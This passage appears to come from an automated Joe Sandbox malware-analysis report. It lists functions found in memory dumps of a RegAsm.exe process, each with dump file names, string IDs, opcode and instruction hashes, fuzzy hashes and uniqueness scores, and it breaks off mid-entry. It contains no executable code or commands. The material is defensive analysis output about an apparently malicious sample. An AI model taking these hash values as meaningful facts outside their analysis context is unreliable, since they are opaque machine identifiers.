                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b0876648c7b75428c866793efa62650a2ac7b7d7d16886203b2b22852c951884
                                                                                                                                    • Instruction ID: e41a016c3bfbfa1c93ed9253cc308287589086de4575cd7ac55805e62214f6ef
                                                                                                                                    • Opcode Fuzzy Hash: b0876648c7b75428c866793efa62650a2ac7b7d7d16886203b2b22852c951884
                                                                                                                                    • Instruction Fuzzy Hash: FDC23E30B501189FCB54DB64C861BEDBBB2FF88704F108099E60A9B3A5DB719E45DFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169DC54 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Hbq
                                                                                                                                    • API String ID: 0-1245868
                                                                                                                                    • Opcode ID: 8bff33fb7e7ea5d379fc26a07444037fa18abdc5fe8f93f263c3d5dd3b6ad983
                                                                                                                                    • Instruction ID: 4483e4d116465f6a864ae7696b0ece9ecbef8c1aebea13580cc623a75f7eb61b
                                                                                                                                    • Opcode Fuzzy Hash: 8bff33fb7e7ea5d379fc26a07444037fa18abdc5fe8f93f263c3d5dd3b6ad983
                                                                                                                                    • Instruction Fuzzy Hash: E021AC303106518FCB18AF2DC868A2E7AEEBFC5650B1544AEE502CB3A1CF68DC06CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC5207 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: a^q
                                                                                                                                    • API String ID: 0-3411664965
                                                                                                                                    • Opcode ID: b20f0b503be4beaf7c4fe513a73190f0f9985c7093d282611db51256631c2c7a
                                                                                                                                    • Instruction ID: d08053e658bf124d77b409b064ccc83c1c7ce45dcd5efba65c9e199671dc2c0c
                                                                                                                                    • Opcode Fuzzy Hash: b20f0b503be4beaf7c4fe513a73190f0f9985c7093d282611db51256631c2c7a
                                                                                                                                    • Instruction Fuzzy Hash: 4521B470600B05AFC315EF29C540556FBE6FFC5200B50CA2DD04A9B625EF70E94A8B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC2CC9 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q
                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                    • Opcode ID: 9006a9807fbc5d21a1396a8163899a6eb09959895342e65352a28b99ba8a2cad
                                                                                                                                    • Instruction ID: 584f242eaff4f77a31279195983e80c5b5a4850ed35132b521e6cc03cb685202
                                                                                                                                    • Opcode Fuzzy Hash: 9006a9807fbc5d21a1396a8163899a6eb09959895342e65352a28b99ba8a2cad
                                                                                                                                    • Instruction Fuzzy Hash: 2131A474904209EFDB05FBB8E86179D7BB2FB44300F108A79D1069B3A8DB785D09CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC5218 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: a^q
                                                                                                                                    • API String ID: 0-3411664965
                                                                                                                                    • Opcode ID: 5d7fd1ab0cc977eaec9fc877eb64883eddddc980843b88ea274956a2d6f77cc8
                                                                                                                                    • Instruction ID: 06c434d1468000270a96200f9eb5912235b024204807413c6bbba130b2014f1b
                                                                                                                                    • Opcode Fuzzy Hash: 5d7fd1ab0cc977eaec9fc877eb64883eddddc980843b88ea274956a2d6f77cc8
                                                                                                                                    • Instruction Fuzzy Hash: E5217171A00B059FD314EF6AC540A5AFBE6FFC5200B50CA3DD04E9B625EF70E94A8B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC2CD8 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q
                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                    • Opcode ID: b38827ee8109210d3c5ef963d8ba902cae3c843c770254e66b6d32db0db6dbeb
                                                                                                                                    • Instruction ID: 5d45082af84296b2f59953e19669281e7998091c17547dc28644aaccd8b50fbb
                                                                                                                                    • Opcode Fuzzy Hash: b38827ee8109210d3c5ef963d8ba902cae3c843c770254e66b6d32db0db6dbeb
                                                                                                                                    • Instruction Fuzzy Hash: BF216F74900209EFDB04FFA8E96575D7BB2FB44301F008A79E1069B368DB785909CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01694AE0 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `Q^q
                                                                                                                                    • API String ID: 0-1948671464
                                                                                                                                    • Opcode ID: e83ed4771d0041b85927b720860e628e09f854b815d7808bb70fd28ba7f29218
                                                                                                                                    • Instruction ID: 2ce8c71044dbf49b72badb11c3fadfe310642da48ce4f5b19f52900902196c0b
                                                                                                                                    • Opcode Fuzzy Hash: e83ed4771d0041b85927b720860e628e09f854b815d7808bb70fd28ba7f29218
                                                                                                                                    • Instruction Fuzzy Hash: CBE0E53234010027D208555AEC45FA766DDEBC5631F25002BF108DB6A0C892DC054264
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685B368 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q
                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                    • Opcode ID: b4c91b41a670c8a2970c5c532d648cc4552e6ce1c9094b4756fcbadae167e8db
                                                                                                                                    • Instruction ID: e3a4d1a79db8d028e8faba169029173039901441d9bd481a8055c5ae6f2758f6
                                                                                                                                    • Opcode Fuzzy Hash: b4c91b41a670c8a2970c5c532d648cc4552e6ce1c9094b4756fcbadae167e8db
                                                                                                                                    • Instruction Fuzzy Hash: 2DF03C34E06209EFCB44FFB8E95495CBBF2FB84200B1045A9D50A9B764DF705A48CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01694AF0 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `Q^q
                                                                                                                                    • API String ID: 0-1948671464
                                                                                                                                    • Opcode ID: d81c34d85697a4c252e6c2d7c973587e16739a9870d067ca43de0d1056fafb7f
                                                                                                                                    • Instruction ID: f150e53dafd5918c385a0901f6e58916353d94d8d9644126cf3803cb192bbd40
                                                                                                                                    • Opcode Fuzzy Hash: d81c34d85697a4c252e6c2d7c973587e16739a9870d067ca43de0d1056fafb7f
                                                                                                                                    • Instruction Fuzzy Hash: 86E086327401146BD318556FEC54F67B6DEFBC9A60F54007EF209DB3A0CC91EC0542A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05538232 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q
                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                    • Opcode ID: 58d8c4a215b3e20b6e599f07cb10eb693e583a5f6e1e48ce81ccfed084f27c51
                                                                                                                                    • Instruction ID: f6f5e725372febd0b29460efb06dcc8cbfd4d90aa025a6081b2cf0d57983ac24
                                                                                                                                    • Opcode Fuzzy Hash: 58d8c4a215b3e20b6e599f07cb10eb693e583a5f6e1e48ce81ccfed084f27c51
                                                                                                                                    • Instruction Fuzzy Hash: C3E0CD315910195BCA2CA61CFD116DD7375F780A15F04879DB40A47664CF145D4A47D1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06833AF8 Relevance: .8, Instructions: 786COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1cc53e11d8c786470d0c07e6806fc7c87d2dcf2afa84123930abcb54bcb74e75
                                                                                                                                    • Instruction ID: 1d0b9014941673baff63c4362875413190a5a66e357a2d88178eccf706e70cee
                                                                                                                                    • Opcode Fuzzy Hash: 1cc53e11d8c786470d0c07e6806fc7c87d2dcf2afa84123930abcb54bcb74e75
                                                                                                                                    • Instruction Fuzzy Hash: 16621934B502149FCB44CF68C994EAEBBF6FF89704F118099E606DB3A6DA71ED418B50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC0D78 Relevance: .8, Instructions: 763COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d95848feeb5a3d24e3d8f71f427bb7a54d673626605debfd7fdfa5254b650c81
                                                                                                                                    • Instruction ID: 73001b5787cbeeb9742de88f6b55620172adf7a2c2b6e88aa7dc944b84cb7499
                                                                                                                                    • Opcode Fuzzy Hash: d95848feeb5a3d24e3d8f71f427bb7a54d673626605debfd7fdfa5254b650c81
                                                                                                                                    • Instruction Fuzzy Hash: 95729FF470021AEFDB64DF78C854B6977B1BB84208F1081E8D9299B762E734D846CF62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 068300D8 Relevance: .7, Instructions: 676COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e662da3a7d58d728b91f57c7d8996152ec18b7822531bcd31d1a644e509ad732
                                                                                                                                    • Instruction ID: 8177e5c842f080c31974a10c73b08a101c881a98ae4afe83f6280395d48e7c8d
                                                                                                                                    • Opcode Fuzzy Hash: e662da3a7d58d728b91f57c7d8996152ec18b7822531bcd31d1a644e509ad732
                                                                                                                                    • Instruction Fuzzy Hash: 0C427C307406299FCB64AF68D460A6EBBF2FBC5305B104A5DD6039B3A0CF76E9058BD5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06832078 Relevance: .6, Instructions: 570COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7e52faca76098846b5e5b746af214fc021e461398fb28e98efcc4b1845be155d
                                                                                                                                    • Instruction ID: 9923c9938f0111e8dec8b947586bea14babeb80996e0a33d52948239e0a9e927
                                                                                                                                    • Opcode Fuzzy Hash: 7e52faca76098846b5e5b746af214fc021e461398fb28e98efcc4b1845be155d
                                                                                                                                    • Instruction Fuzzy Hash: 96226A74B502248FCB54DB24C965EEE77B2EF88704F108199EA069B395CF71DD818FA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06832077 Relevance: .6, Instructions: 568COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5e9209ce71190eecabdf1d706caeb8b85aaa0073e6ff7451a2e6a7161dcca2da
                                                                                                                                    • Instruction ID: 1781be88bacb3a97a8fed27f394ca65f0e6dea802cdb6c811d3233bce924042f
                                                                                                                                    • Opcode Fuzzy Hash: 5e9209ce71190eecabdf1d706caeb8b85aaa0073e6ff7451a2e6a7161dcca2da
                                                                                                                                    • Instruction Fuzzy Hash: CB226A74B502248FCB54DB24C965EEE77B2EF88704F108199EA069B395CB71DD818FA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06830610 Relevance: .4, Instructions: 447COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 943c6209e6dc40fa0661cd6f0411ef210e8dffb29c117675c3bdca2905b248cd
                                                                                                                                    • Instruction ID: 89939bd726f064d333e3768e4bce16ed4a0b1cd05bfc8f5088ebd1c3155466e8
                                                                                                                                    • Opcode Fuzzy Hash: 943c6209e6dc40fa0661cd6f0411ef210e8dffb29c117675c3bdca2905b248cd
                                                                                                                                    • Instruction Fuzzy Hash: A402BB307403288FDB549F64C864A6EBBB2FB89704F108959D6029B3A1CFB6ED05CBD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06830688 Relevance: .4, Instructions: 389COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 83d95f8baf77c851e91d3f57baf66892723c9da9b57188f72d8fd6fd518ad27f
                                                                                                                                    • Instruction ID: 11e09bc08261a3f8c093bd6f4916d4eecd176c8569eab223bee2be74212f5cdf
                                                                                                                                    • Opcode Fuzzy Hash: 83d95f8baf77c851e91d3f57baf66892723c9da9b57188f72d8fd6fd518ad27f
                                                                                                                                    • Instruction Fuzzy Hash: 07E1B0307402289FDB549B65C865B6DBBB2FB89704F10845AEA02DB3A1CFB6DD41CBD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC5670 Relevance: .4, Instructions: 371COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b75023adb1e9677662720e1b7d6ea74618312e6cd75978f95b799618ef6b7691
                                                                                                                                    • Instruction ID: 8b98bb9a625fe9d64a54ed7f0a0e65e05cd30f048e364223ea4700411f91fb45
                                                                                                                                    • Opcode Fuzzy Hash: b75023adb1e9677662720e1b7d6ea74618312e6cd75978f95b799618ef6b7691
                                                                                                                                    • Instruction Fuzzy Hash: 27F12CB1D0060ADFDB14DF69C940A99FBB5FF88310F24C699E818AB215EB70E991CF41
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06830700 Relevance: .4, Instructions: 367COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2803514a4cba5d4da3ca52efd4b34e7086fe4ea315a59ecd9eabab190512f13b
                                                                                                                                    • Instruction ID: c108862e66c42a4211695bf1eedfc9124b53144a198e283db6b2fdaa0a8f2406
                                                                                                                                    • Opcode Fuzzy Hash: 2803514a4cba5d4da3ca52efd4b34e7086fe4ea315a59ecd9eabab190512f13b
                                                                                                                                    • Instruction Fuzzy Hash: ECD19130740228DFDB449B65C865B6DBBB6FB89704F10845AEA02DB3A1CB76DD41CBE1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 068300B7 Relevance: .3, Instructions: 338COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f381300dc2442368f73c9dbbe8cc13e34fded887de980907a515835213ed8c67
                                                                                                                                    • Instruction ID: 9022d88a93325f660210d1a8fff4f9a94a6bfe8ae1fbccc3249637b5aafd1478
                                                                                                                                    • Opcode Fuzzy Hash: f381300dc2442368f73c9dbbe8cc13e34fded887de980907a515835213ed8c67
                                                                                                                                    • Instruction Fuzzy Hash: FCC18F30B40218DFDB449B69C865B6DBBB6FF89704F108056EA02DB3A1CB76DD45CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169DDE8 Relevance: .3, Instructions: 332COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4f1730f27bb3fd7de13aefb3b8508ed84eb2fa153e2ae04cc5114c2790ba6194
                                                                                                                                    • Instruction ID: caaccf10910bad97cde80374376de6f1cc2d7043fa1ec46a72ff2587d1cb9d01
                                                                                                                                    • Opcode Fuzzy Hash: 4f1730f27bb3fd7de13aefb3b8508ed84eb2fa153e2ae04cc5114c2790ba6194
                                                                                                                                    • Instruction Fuzzy Hash: 0CE11B71A0021ACFDF15DFA4C884B9DBBB6FF85304F1140A9E909AB365CB75A986CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05536938 Relevance: .3, Instructions: 326COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5e5c8b514ffe4575090186ed1938c3c76316a096f68c2c02aa0e65bb13cd10d6
                                                                                                                                    • Instruction ID: b922b59fd4be6ac2cfa55955f08f4bcc2b310f2b3cbf4cc370bc2d5e544d6b81
                                                                                                                                    • Opcode Fuzzy Hash: 5e5c8b514ffe4575090186ed1938c3c76316a096f68c2c02aa0e65bb13cd10d6
                                                                                                                                    • Instruction Fuzzy Hash: 36E13174901229DFDB65DF61C958BE9BBB2FF49300F0084E9E509AB2A0DB359A84CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05535A68 Relevance: .3, Instructions: 268COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 89069c7e66ec05516b4a4228bb34a6d35dffe619d644e2492cf1e38c85417cd5
                                                                                                                                    • Instruction ID: 34bd9699c001d6e2c4279a25aca055d18c7f9719dc623a84f65e37966caa8cba
                                                                                                                                    • Opcode Fuzzy Hash: 89069c7e66ec05516b4a4228bb34a6d35dffe619d644e2492cf1e38c85417cd5
                                                                                                                                    • Instruction Fuzzy Hash: 64A13C34A1030ACFCB05EFB4C995AAEB7F6BF89304F645569D40AAB264EF309D45CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01695CC4 Relevance: .2, Instructions: 240COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9015d55e8850d9080b75487892926a4414c8ae94449ee6e85e6806abe7b83766
                                                                                                                                    • Instruction ID: 0e2668d8035a6d1ee6417e6cb42ab615bc9766ea4fea2ecb187bd08b43fa9e77
                                                                                                                                    • Opcode Fuzzy Hash: 9015d55e8850d9080b75487892926a4414c8ae94449ee6e85e6806abe7b83766
                                                                                                                                    • Instruction Fuzzy Hash: C0A18630A1060ACFCF04EF69C88499DBBB5FF89310F5186ADE505AB365EB71E945CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169A9D0 Relevance: .2, Instructions: 237COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 10cb40d8fde722cd5aaf7c5bd7d4a2dc8d433ca73fa6dc81ebcb5dd62b887f13
                                                                                                                                    • Instruction ID: 5417836d61ad7c141b1c1bf969fbb9d54e8264de18c1ea2e20d73dd1468ff242
                                                                                                                                    • Opcode Fuzzy Hash: 10cb40d8fde722cd5aaf7c5bd7d4a2dc8d433ca73fa6dc81ebcb5dd62b887f13
                                                                                                                                    • Instruction Fuzzy Hash: C0817A30300A528FEF15EF68C9557AA7BEABF95204F040629D542CB3A5DB34E891CBA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 055393A8 Relevance: .2, Instructions: 235COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 70c280bc57518590c96686c1ed0184d1e3ecc54a7e58cfcb256c21316db01b89
                                                                                                                                    • Instruction ID: 02a0571f115133fd64aa92f2b547308bf382df55fbc7b0040e0ee0f4b2fcbccd
